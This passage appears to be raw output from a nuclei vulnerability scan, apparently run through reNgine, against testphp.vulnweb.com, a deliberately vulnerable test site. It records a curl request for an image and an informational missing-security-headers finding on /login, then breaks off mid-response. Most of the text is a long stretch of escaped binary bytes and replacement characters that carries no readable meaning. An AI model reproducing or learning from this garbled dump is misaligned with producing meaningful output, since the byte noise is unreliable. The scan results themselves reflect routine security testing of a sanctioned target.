\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:21.560650378Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not 